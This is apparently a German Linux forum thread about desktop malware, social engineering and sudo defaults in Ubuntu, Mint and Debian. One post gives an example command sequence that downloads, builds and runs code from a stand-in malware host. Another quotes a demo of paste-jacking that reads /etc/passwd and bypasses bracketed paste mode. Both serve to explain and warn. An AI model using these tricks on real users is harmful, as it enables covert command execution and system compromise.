https://www.heise.de/security/meldung/A ... 78508.htmlWie die Schadprogramme jeweils auf den Rechner kommen, ist nicht bekannt. Es ist gut vorstellbar, dass dies etwa im Rahmen von Spear-Phishing mit ausgefeiltem Social Engineering erfolgt. Denn dagegen sind auch Linux-Nutzer nicht immun.
Malware für den Linux-Desktop
Malware für den Linux-Desktop
Bei Heise gibt es einen Artikel zu Malware für den Linux-Desktop. Recht interessant finde ich die Vermutungen zur Verbreitung:
Re: Malware für den Linux-Desktop
Wobei man jetzt gerne wüsste, was man sich unter „Spear-Phishing“ und „Social Engineering“ vorzustellen hat. Immerhin geht's um ein Desktop-Problem. Der Schreiber des verlinkten Artikels hält eine Information darob nicht für nötig und verlinkt auch nicht auf eine solche.
Grüße, Günther
Grüße, Günther
Re: Malware für den Linux-Desktop
Wenn ich mich recht erinnere, liegt der Anteil von Linux bei Desktopsystemen doch im niedrigen einstelligen Prozentbreich!?
Also -- no panic
Gruß KH
Also -- no panic

Gruß KH
Re: Malware für den Linux-Desktop
Spear-Phishingguennid hat geschrieben:25.07.2019 10:42:39Wobei man jetzt gerne wüsste, was man sich unter „Spear-Phishing“ und „Social Engineering“ vorzustellen hat.
Social Engineering
Re: Malware für den Linux-Desktop
Wenn ich es richtig verstanden habe, dann ist es kein Linux-Problem. Der Anwender besorgt und installiert sich seine Malware selbst aus irgendeiner unsicheren Quelle.
Re: Malware für den Linux-Desktop
Jain. Bei den geschilderten Fällen ist das Angriffsziel der User-Desktop, nicht das ganze System. Was ja auch Sinn macht, da zB im Bereich Maschinenbau teilweise auf Linux-Rechnern entwickelt wird. Das macht diese Rechner für Industrie-Spionage anfällig.uname hat geschrieben:25.07.2019 12:41:31Wenn ich es richtig verstanden habe, dann ist es kein Linux-Problem.
Ich sehe daher schon ein "Linux"-Problem, da es für Malware-Produzenten inzwischen interessant ist, überhaupt Malware für Desktop-Linux (hier Gnome) zu produzieren. Der Tenor bei vielen von mir verfolgten Diskussionen zu diesem Bereich war immer: " Da muss man nicht aufpassen, Linux am Desktop hat keine Verbreitung. Und das System lässt sich so sowieso nicht kapern." Aber man muss eben schon aufpassen und vorsichtig bleiben. Denn das ein hilfreiches Desktop-Applet für zB eine Wettervorherschau eine Hintertür für böse Buben hat, daran glaubt man manchmal eben nicht. Vor allem, wenn die Empfehlung für das Desktop-Applet von einem "Freund" oder "Bekannten" kommt.
Re: Malware für den Linux-Desktop
Ich sehe es nicht als Desktop-Problem, wenn der Anwender irgendeine Anwendung an den Paketquellen vorbei installiert. Dass dieses Tool evtl. ein Feature für den Desktop sein sollte ist meiner Meinung nach nur zweitrangig.
Vergleich zu Android:
Bei Android kann man aus unsicheren Quellen APK-Dateien installieren. Aber es ist doch kein Problem des Playstores oder von Android, wenn der Anwender unsichere Quellen aktiviert, sich eine apk-Datei zieht und installiert. Wobei die Apple-Welt sieht gerade die Möglichkeit es zu tun als den Sicherheitsnachteil von Android.
Vergleich zu Android:
Bei Android kann man aus unsicheren Quellen APK-Dateien installieren. Aber es ist doch kein Problem des Playstores oder von Android, wenn der Anwender unsichere Quellen aktiviert, sich eine apk-Datei zieht und installiert. Wobei die Apple-Welt sieht gerade die Möglichkeit es zu tun als den Sicherheitsnachteil von Android.
Re: Malware für den Linux-Desktop
Der Desktop ist in diesem Zusammenhank ein nützliches Vehikel. Auf der Kommandozeile muß man sich halt auskennen. Der Desktop erlaubt durch den Bedienkomfort die Installation von Malware mit einem Klick. Von der Kommandozeile fängt sich keiner Malware mit
Code: Alles auswählen
wget https://malware.server.cx/downloads/malware.tgz
tar xvfz malware.tgz
cd malware
./configure
make
make install
malware.sh

Apple behauptet zwar, daß ihr System sicherer sei, dabei gibt es auch im AppStore genug Software, die mit Schnüffelroutinen und Schadsoftware verseucht ist. Das einzige, was Apple bei einer App kontrolliert, ist, ob jemand, der eine App im Store anbieten will, Routinen aufruft, die sie gemäß Apple nicht aufrufen dürfen. Schließlich will Apple 30% Provision für alle App-Verkäufe und alle In-App-Verkäufe und über den finanziellen Teil der App wacht Apple mit Argusaugen.Wobei die Apple-Welt sieht gerade die Möglichkeit es zu tun als den Sicherheitsnachteil von Android.
Re: Malware für den Linux-Desktop
@MSfree
Danke für die Links!
Nr. 1 wäre also sowas wie auf einen bestimmten Personenkreis gezielte Ausspähung persönlicher IT-Daten (z.B. Passwörter, Bankverbindungen).
Nr. 2 wäre in meinem Verständnis schlicht Manipulation eines Internet-Teilnehmers. Nach meinem Dafürhalten bedarf es dazu keiner (in der Regel kurzlebiger) gesonderten „Herrschaftssprache“. Der Heise-Artikel wäre nur unwesentlich länger geworden.
Grüße, Günther
Danke für die Links!
Nr. 1 wäre also sowas wie auf einen bestimmten Personenkreis gezielte Ausspähung persönlicher IT-Daten (z.B. Passwörter, Bankverbindungen).
Nr. 2 wäre in meinem Verständnis schlicht Manipulation eines Internet-Teilnehmers. Nach meinem Dafürhalten bedarf es dazu keiner (in der Regel kurzlebiger) gesonderten „Herrschaftssprache“. Der Heise-Artikel wäre nur unwesentlich länger geworden.
Grüße, Günther
Re: Malware für den Linux-Desktop
Muss man den Download nicht noch ausführbar machen oder geht das mittlerweile automatisch?MSfree hat geschrieben:Der Desktop erlaubt durch den Bedienkomfort die Installation von Malware mit einem Klick.
Idee:
Könnte man nicht /home "noexec" mounten?
Ich denke ein Aufruf von "bash script.sh" wäre weiter möglich, wäre aber wohl auf dem Desktop nicht vorgesehen.
Am Ende liegt es wohl am Anwender.
Nutzt ihr irgendwelche speziellen Konfigurationen z. B. für Bekannte?
Re: Malware für den Linux-Desktop
Das dürfte das Kernproblem bei gefühlt 90% aller erfolgreichen Malware-Attacken oder bei Phishing sein. Gerade wenn etwas direkt oder scheinbar von bekannten Personen kommt, wird man leichter nachlässig.
Ich selber habe mir zB einmal auf einem Win98-Rechner einen Virus eingefangen: Ein Freund hat mir eine Diskette mit Programm gegeben. Ich hatte ihn gefragt, ob er die Diskette auf Viren geprüft hat. Er hat damals ja gesagt und ich habe die Diskette dann aus Faulheit nicht selber überprüft. Danach hatte ich einen Virus auf dem Rechner.
Re: Malware für den Linux-Desktop
debianoli hat geschrieben:25.07.2019 12:54:44Ich sehe daher schon ein "Linux"-Problem, da es für Malware-Produzenten inzwischen interessant ist, überhaupt Malware für Desktop-Linux (hier Gnome) zu produzieren.
Auf den ersten Blick 2 scheinbar gegensätzliche Aussagen.... aber ich glaube, dass beides zutrifft und beides auch nicht zutrifft. Ich sage hierbei aber nicht Linux, sondern Distribution. Meiner Meinung nach sind private Ubuntu- und Mint-Systeme vermutlich geradezu dazu prädestiniert, Opfer von Schadsoftware zu werden .... Mint noch deutlich mehr, als Ubuntu, weil Mint sich imho als Windows-Alternative geriert und teilweise auch das Verhalten und die Erwartungshaltung der Neuankömmlinge aus der Win-Welt importiert hat. Es gibt imho keinen einfacheren Weg der Kompromittierung solcher Systeme als über diese Flatpaks, Snaps, ppa's, etc. aus anoynmen Quellen. Empfehlungen für irgendwelche ppa' sind da m.M.n. völlig normal. In Verbindung mit sudo stehen da einem Angreifer alle Möglichkeiten ungebremst zur Verfügung. All das ist bei Debian aber im Regelfall total unüblich, hier wird zumeist von sudo abgeraten und Empfehlungen für fremde Paketquellen findet man hier überhaupt nicht, sondern regelmäßig nur Verweise aufs eigene Repo und allenfalls die Backports.... aber immer im selben Haus verbleibend.debianoli hat geschrieben:25.07.2019 14:07:04Das dürfte das Kernproblem bei gefühlt 90% aller erfolgreichen Malware-Attacken oder bei Phishing sein. Gerade wenn etwas direkt oder scheinbar von bekannten Personen kommt, wird man leichter nachlässig.
So einfach, wie es ist, ein Ubuntu oder Mint auch einschließlich der System-Binaries zu übernehmen, so bin ich davon überzeugt, dass das bei einem Debian nicht so schnell möglich ist.... der Schaden bei Debian bleibt imho aufs Homedir begrenzt. Und da ist die Lösung, das Homedir einfach umbennennen, neu anmelden, und die Zecke ist quasi isoliert. Hats hingegen Zugriff durch die Maleware auf /usr oder /opt gegeben, sieht die Welt ganz anders aus. Aber das verhindert Debian eigentlich doch schon ganz gut, weils schon beim Installer zwischen user und admin deutlich unterscheidet und damit vorsieht, dass sich der user unter seiner UID keine höheren Rechte aneignen kann.... was allerdings der "berechtigte" User natürlich wieder sabotieren kann. Ich glaube, bei U + M ist es eher die Distribution, die es dem Angreifer leicht macht, bei D isses der Anwender, der die Default-Features umgehen oder außer Kraft setzen muss.Darüber hinaus schätze ich die Debian-Anwender als gravierend weniger fahrlässig ein und auf der anderern Seite auch deutlich sachkundiger. Also meiner Meinung nach, nicht pauschal Linux, sondern einige Distributionen werden härter getroffen, als andere... und mit Debian ist es imho leicht, allen Einschlägen erfolgreich aus dem Weg zu gehen.
jm2c
Re: Malware für den Linux-Desktop
Soso:MSfree hat geschrieben:25.07.2019 13:26:29Von der Kommandozeile fängt sich keiner Malware mitein.Code: Alles auswählen
wget https://malware.server.cx/downloads/malware.tgz tar xvfz malware.tgz cd malware ./configure make make install malware.sh
http://thejh.net/misc/website-terminal-copy-paste

Re: Malware für den Linux-Desktop
Das ist aber gar nicht der Sinn der geschilderten Malware. Die wollen nur an die Daten von $home und an Passwörter. Das geht wohl per Gnome-Widget und Keylogger. Und bei Verwendung eines Mail-Programms ist der Inhalt von $home sehr wohl mehr als interessant, denn dort stehen meist Firmeninterna.TomL hat geschrieben:25.07.2019 14:45:28... dass das bei einem Debian nicht so schnell möglich ist.... der Schaden bei Debian bleibt imho aufs Homedir begrenzt. Und da ist die Lösung, das Homedir einfach umbennennen, neu anmelden, und die Zecke ist quasi isoliert.
Und wenn man gar nicht bemerkt, dass man sich Malware eingefangen hat, dann benennt man auch kein User-Home um.
Zuletzt geändert von debianoli am 25.07.2019 15:32:17, insgesamt 1-mal geändert.
Re: Malware für den Linux-Desktop
Auch wenn Du der Praxis absolut recht hast, ist das weniger ein Distributions Problem als eins der Zielgruppe.TomL hat geschrieben:25.07.2019 14:45:28
So einfach, wie es ist, ein Ubuntu oder Mint auch einschließlich der System-Binaries zu übernehmen, so bin ich davon überzeugt, dass das bei einem Debian nicht so schnell möglich ist....
Sowohl Mint als auch Ubuntu richten sich auch an Einsteiger und weniger versierte Anwender. Diese findet man bei Debian weniger.
Auch unter Debian kann man ein .deb herunterladen und installieren, oder fremde Repositorien einbinden. Oder eben eine "praktische" Gnome Extension installieren. Und ob man einer Anwendung mit su oder sudo root rechte verschafft, bleibt sich im Ergebnis auch gleich. Es ist also die Erfahrung der Anwender und die andere Kultur in den Foren und wikis, die schützt, weniger die Technik der Distribution.
Grade vor dem Beispiel Gnome extentsion würde ich mich selbst auch nicht grundsätzlich ausnehmen (davon abgesehen das ich kein Gnome nutze). Diese extension sind ja wohl gerade darauf ausgelegt, den Desktop um neue, zusätzliche Funktionen zu erweitern, und sicher in der Regel nicht in den Debian paketquellen. Ich würde nicht ausschließen, selbst soetwas zu installieren, wenn die funktion praktisch ist und mir die Quelle seriös vorkommt, und vielleicht noch von einem Freund oder in einem Debian Wiki empfohlen wird. Extensions nutze ich auch bei firefox, in der Regel auch mit aktivierten automatischen Updates, oft sind sie einfach zu praktisch um ständig Sicherheitsbedenken vor sich her zu tragen. Zwar "nur" im user Kontext, aber da liegen auch alle meinen sensiblen Daten.
Re: Malware für den Linux-Desktop
Die Methode, so geschickt, wie sie ist, funktioniert auf der Konsole nicht. Kein X11, kein Copy'n'Paste.

Re: Malware für den Linux-Desktop
Dem ersten Satz stimme ich nicht zu.... denn die unter Ubuntu und Mint präferierte Administrations-Methode ist technisch begründbar eindeutig mehr Malware begünstigend, als es das unter Debian ist. Aber ja, es stimmt, Debian scheint in der tradionell verbreiteten Meinung weniger Einsteigerfreundlich zu sein... aber es ist tatsächlich nur dem Schein nach so. Ich habe bereits mehrere Anfänger-Systeme mit dem NonFree-Netinst-Iso eingerichtet, und die wurden im Nachgang von vorurteilsfreien Umsteigern nie als Einsteigerunfreundlich beurteilt. Im Gegenteil, "wow, so einfach geht das?", war eher mehrheitlich die Meinung.Ibex hat geschrieben:25.07.2019 15:32:02Auch wenn Du der Praxis absolut recht hast, ist das weniger ein Distributions Problem als eins der Zielgruppe.
Sowohl Mint als auch Ubuntu richten sich auch an Einsteiger und weniger versierte Anwender. Diese findet man bei Debian weniger.
Auch unter Debian kann man ein .deb herunterladen und installieren, oder fremde Repositorien einbinden.
Ich habe nie die Möglichkeit infrage gestellt, natürlich geht das mit Debian auch..... nur liegt der massgebliche Unterschied meiner Meinung nach im Sprachgebrauch oder in der Sichtweise dieses Forums bzw. der erfahrenen Debian-Anwender, die solche Aktionen in meiner Erinnerung fast immer ablehnen und davon abraten. Aber natürlich ist es auch hier so, keine Regel ohne Ausnahme.... die Palemoon-Nutzer werden wohl zumeist ein aktuelles Paket selber direkt von der Project-Seite runterladen.... keine Ahnung, ob jemand tatsächlich das Repo eingetragen hat, ich habs jedenfalls nicht. Es wird wohl auch noch anderen Ausnahmen geben, aber das sich solche Ausnahmen als Empfehlungen allgemein etabliert haben, ist mir jedenfalls so nicht bewusst.
Nun ja, dieser Satz ist bei Vorhandensein einer sudo-Default-Konfiguration -wie oben schon erwähnt- eindeutig technisch widerlegbar, da besteht nämlich ein großer Unterschied. Und bei Umsteigern/Einsteigern als Zielgruppe kann man wohl von einer Default-Konfiguration ausgehen.Und ob man einer Anwendung mit su oder sudo root rechte verschafft, bleibt sich im Ergebnis auch gleich.
Ich würde das so formulieren: Debian unterstützt den erfahreneren Anwender darin, sein System zu schützen. Die zwei anderen von mir genannten Distributionen unterstützen den Umsteigeprozess von Windows und neutralisieren damit teilweise das linuxeigene Immunsystem.... letztlich zum Nachteil des Anwenders, wenn sich das mit spezieller Linux-Malware wirklich mal im großen Stil durchsetzen wird.Es ist also die Erfahrung der Anwender und die andere Kultur in den Foren und wikis, die schützt, weniger die Technik der Distribution.
Re: Malware für den Linux-Desktop
Ich unterscheide das nicht.... weder die Intention eines solchen Programms, noch die Quelle oder der Einsatzort des Programms auf dem Rechner, noch die Motivation der Programmierer haben für mich irgendeine Bedeutung. Für mich ist jegliche Software (außerhalb des Setups durch den Installer) eine Schadsoftware, die ich nicht selber bewusst und vorsätzlich installiert habe. Völlig egal, ob das ein Shellscript ist, eine GUI-Extension, ein Plugin irgendeines Programms, ein Addon oder ein Binary ist. Mir ist auch gleichgültig, welche Daten im Fokus dieser Schadsoftware stehen, ob es nur lesen will oder verschlüsseln oder zerstören... macht für mich alles keinen Unterschied. Ich habe alles mir (!) mögliche an Vorkehrungen getroffen, dass meine Anwender keinen fremde Software starten können, die ich nicht installiert habe. Dabei ist mir klar, für viele der Mitglieder aus dem Forum wären das keine Hürden, für meine Anwender sind die ohne äußere Hilfe jedoch unüberwindbar.debianoli hat geschrieben:25.07.2019 15:31:36Das ist aber gar nicht der Sinn der geschilderten Malware. Die wollen nur an die Daten von $home und an Passwörter.
Re: Malware für den Linux-Desktop
Re: Malware für den Linux-Desktop
Jetzt fragt sich nur, aus welchem Browser du den Text kopieren willst. Ohne X11 kein Firefox, Chromium...
Lynx zeigt die Seite http://thejh.net/misc/website-terminal-copy-paste übrigens so an:
Code: Alles auswählen
←←← Copy-Paste from Website to Terminal
You surely know this: You're looking at some website with some useful shell commands. However, those commands
are long as hell and you know you're probably not gonna need them for a few years or so (so there's no need to
memorize them). So, what do you do? You copy-paste them. Here's an example:
git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy
code from websites you don'"'"'t trust!
Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
Try running this command in your terminal. It's supposed to be harmless, right? It is harmless, yes, but what
happens still isn't what you'd expect and demonstrates the dangers in doing stuff like that. Mark it with your
mouse, copy it somehow (e.g. using CTRL+C) and paste it into a terminal. What happens?
There are some good comments and suggestions on how you can mitigate this kind of attack on reddit and Hacker
News. [DEL: Also, oh-my-zsh now includes a fix for this issue (which relies on Bracketed Paste Mode support in
the terminal). :DEL] Oh, and it seems that other people wrote a detailed text about this issue in 2008.
Please note that Bracketed Paste Mode DOES NOT always fix this because the end sequence can be inside the text
you paste unless your terminal emulator filters out the bracketed paste characters when pasting! For those of
you who have installed the oh-my-zsh stuff, the following variant (which includes an escape sequence) might
still work against you:
git clone [201~/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea.
Don'"'"'t copy code from websites you don'"'"'t trust!
Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
Re: Malware für den Linux-Desktop
MSfree hat geschrieben:25.07.2019 19:16:53Jetzt fragt sich nur, aus welchem Browser du den Text kopieren willst. Ohne X11 kein Firefox, Chromium...

Re: Malware für den Linux-Desktop
Einmal eingerichtet wüsste ich auch nicht warum man Debian als weniger einsteigerfreundlich ansehen soll, aber die Ertsteinrichtung ist eben etwas aufwendiger.TomL hat geschrieben:25.07.2019 17:25:28Aber ja, es stimmt, Debian scheint in der tradionell verbreiteten Meinung weniger Einsteigerfreundlich zu sein... aber es ist tatsächlich nur dem Schein nach so. Ich habe bereits mehrere Anfänger-Systeme mit dem NonFree-Netinst-Iso eingerichtet, und die wurden im Nachgang von vorurteilsfreien Umsteigern nie als Einsteigerunfreundlich beurteilt.Ibex hat geschrieben:25.07.2019 15:32:02Auch wenn Du der Praxis absolut recht hast, ist das weniger ein Distributions Problem als eins der Zielgruppe.
Sowohl Mint als auch Ubuntu richten sich auch an Einsteiger und weniger versierte Anwender. Diese findet man bei Debian weniger.
Du beziehst Dich jetzt auf die Art wie sudo bei Ubuntu benutzt wird? Oder hast du noch andere Kritikpunkte? Zu sudo bei Ubuntu gibt es ja schon ellenlange Diskussionen, ich halte das jetzt nicht für so ein riesen Problem, weiß aber das es andere Ansichten gibt.TomL hat geschrieben:25.07.2019 17:25:28Dem ersten Satz stimme ich nicht zu.... denn die unter Ubuntu und Mint präferierte Administrations-Methode ist technisch begründbar eindeutig mehr Malware begünstigend, als es das unter Debian ist.
Ich bleibe aber dabei das es weniger die Technik als die Kultur ist. Bei Ubuntu wird Dir in den meisten Wikis schon auf Seite 3 das erste ppa für aktuellere Software empfohlen, das findet man bei Debian kaum. Aber wirklich wirksame Schutzmechanismen gegen die Installation aus Fremdquellen sehe ich bei Debian auch nicht.
Snap/flatpaks sind noch mal eine andere Sache, das macht es noch mal einfacher, sich problematische Software mit einem klick zu installieren, vor allem ist es aber auch hier wieder die Gewohnheit, sich Software aus allen mögliche Quellen zusammenzusuchen, die unterstützt wir und die problematisch ist.
Jetzt muss ich doch noch mal zu einem link zu einem entsprechenden technischen Beleg fragen, du klingst so überzeugt davon.TomL hat geschrieben:25.07.2019 17:25:28Nun ja, dieser Satz ist bei Vorhandensein einer sudo-Default-Konfiguration -wie oben schon erwähnt- eindeutig technisch widerlegbar, da besteht nämlich ein großer Unterschied.Und ob man einer Anwendung mit su oder sudo root rechte verschafft, bleibt sich im Ergebnis auch gleich.
Wie gesagt, das Linux eigene Immunsystem zu erkenne fällt mir schwer. Ubuntu und Mint unterstützen aber die "Windows Denkweise" bei der Installation von Software, was bei einer stärkeren Verbreitung zwangsweise zu ähnlichen Sicherheitsproblemen wie bei Windows führen wird.TomL hat geschrieben:25.07.2019 17:25:28Ich würde das so formulieren: Debian unterstützt den erfahreneren Anwender darin, sein System zu schützen. Die zwei anderen von mir genannten Distributionen unterstützen den Umsteigeprozess von Windows und neutralisieren damit teilweise das linuxeigene Immunsystem.... letztlich zum Nachteil des Anwenders, wenn sich das mit spezieller Linux-Malware wirklich mal im großen Stil durchsetzen wird.Es ist also die Erfahrung der Anwender und die andere Kultur in den Foren und wikis, die schützt, weniger die Technik der Distribution.
Re: Malware für den Linux-Desktop
Gerne, hast Du bekommen....Ibex hat geschrieben:26.07.2019 12:45:06Jetzt muss ich doch noch mal zu einem link zu einem entsprechenden technischen Beleg fragen, du klingst so überzeugt davon.
Soweit es Debian angeht, ist das für mich leicht erkennbar: Im Default-Ergebnis des Debian-Installers kann sich der Installer-User (UID 1000) anschließend und im Normalbetrieb des Systems keine unter seiner UID wirksamen Rechte aneignen, die über seine eigenen Rechte hinausgehen, um z.B. das System unter seiner UID und dem eigenen Password zu veränden. Das ist der historischen Linie folgend, dass nur root das Recht hat, Änderungen am System oder an Berechtigungen vorzunehmen... und das ist für mich das wirkungsvollste Immunsystem überhaupt. U + M haben allerdings genau das neutralisiert, der Anwender kann unter seiner UID und mit seinem eigenen Password durch eine völlig missbräuchliche Verwendung von "sudo" nicht nur Berechtigungen ändern, sondern er kann sogar das System als solches verändern. Da aber genau das aufs einfachste bei Angriffen missbraucht werden kann, haben diese Systeme in meiner Sichtweise keinerlei Immunsystem mehr.Ibex hat geschrieben:26.07.2019 12:45:06Wie gesagt, das Linux eigene Immunsystem zu erkenne fällt mir schwer.
Das kann man auch eigentlch nicht anders sehen, weil man dann meiner Meinung nach einfach die Fakten verleugnet......

Da sind wir vollkommen einer Meinung. Im empfinde es nur als irritierend, dass U + M die seit über einem Jahrzehnt bei Windows bekannten Fehler wiederholen wollen.... mit den bei der Konkurrenz abgeschauten Erfahrungen hätte man es allemal besser machen können.Ibex hat geschrieben:26.07.2019 12:45:06Ubuntu und Mint unterstützen aber die "Windows Denkweise" bei der Installation von Software, was bei einer stärkeren Verbreitung zwangsweise zu ähnlichen Sicherheitsproblemen wie bei Windows führen wird.
-
- Beiträge: 202
- Registriert: 11.03.2018 23:09:05
Re: Malware für den Linux-Desktop
Ich benutze derzeit das default-Terminal in Openbox "xterm". Dort ist cp nicht möglich. Das sah ich als Beschneidung einer Angewohnheit von mir, welche ich zB mit "lxterminal" eingübt hatte. Nun sehe ich die fehlende Funktion vor den hiesigen Informationen aber als vorteilhaft an. Zudem hatte ich zeitweise mein root- und user-Passwort über cp ins terminal eingefügt. Insbesondere diese Passwörter haben aber in der Zwischenablage nichts verloren, wie ich nun meine.MSfree hat geschrieben:25.07.2019 15:40:48Die Methode, so geschickt, wie sie ist, funktioniert auf der Konsole nicht. Kein X11, kein Copy'n'Paste.![]()
Derzeit Frage ich mich, warum man in die root- und user-Passwörter in Linux keine PINs - zB mit virtueller Tastatur - einbauen kann.
Also zB an 3. 8. 12. und 16. Stelle im Paswort verteile ich eine 4-Stellige alphanumerische PIN mit einem Sonderzeichen. Meine Ausdrucksweise für eine PIN, die da zB lautet "P6f+" verteile ich auf die Passwortstellen ( 3.8.12.16). Das wäre bei einem Passwort mit 21 Stellen dann: xxxPxxxxx6xxxxfxxxx+xxxxx.
Ich würde gerne wissen, warum das in Linux nicht funktionieren kann. Weiß da jemand mehr?
Das wäre aber eventuell bereits Stoff für einen separaten Thread.
Re: Malware für den Linux-Desktop
Ich versuche gerade zu verstehen, was Du sagen möchtest..... gar nicht mal so einfach....

Doch, natürlich funktioniert das auch auch, nur etwas anders... Middle-Click oder Shift-Insert fügen aus dem Clipboard ein.debianuser4782 hat geschrieben:26.07.2019 17:57:00Ich benutze derzeit das default-Terminal in Openbox "xterm". Dort ist cp nicht möglich.
Warum soll das nicht funktionieren? Du kannst Dir doch ein beliebiges Password ausdenken und dann an die genannten Stellen irgendwas einfügen.... was hindert Dich daran, das so zu tun...?.... dann ist es eben ein um 4 Stellen längeres Password, also ohne die Einfügungen. Du bist doch eigentlich ziemlich frei in Deiner Password-Gestaltung.Also zB an 3. 8. 12. und 16. Stelle im Paswort verteile ich eine 4-Stellige alphanumerische PIN mit einem Sonderzeichen. Meine Ausdrucksweise für eine PIN, die da zB lautet "P6f+" verteile ich auf die Passwortstellen ( 3.8.12.16). Das wäre bei einem Passwort mit 21 Stellen dann: xxxPxxxxx6xxxxfxxxx+xxxxx.
Stellst Du Dir dabei eine Unterstützung durch Debian vor? Wie sollte die aussehen? Oder was genau funktioniert da nicht?Ich würde gerne wissen, warum das in Linux nicht funktionieren kann. Weiß da jemand mehr?